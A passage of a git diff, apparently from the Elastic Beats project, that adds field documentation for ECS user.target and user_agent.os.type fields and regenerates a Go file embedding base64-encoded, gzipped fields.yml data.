+example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -8665,6 +8931,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8781,6 +9160,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/journalbeat/include/fields.go b/journalbeat/include/fields.go index 05719a08b721..1046b7624e34 100644 --- a/journalbeat/include/fields.go +++ b/journalbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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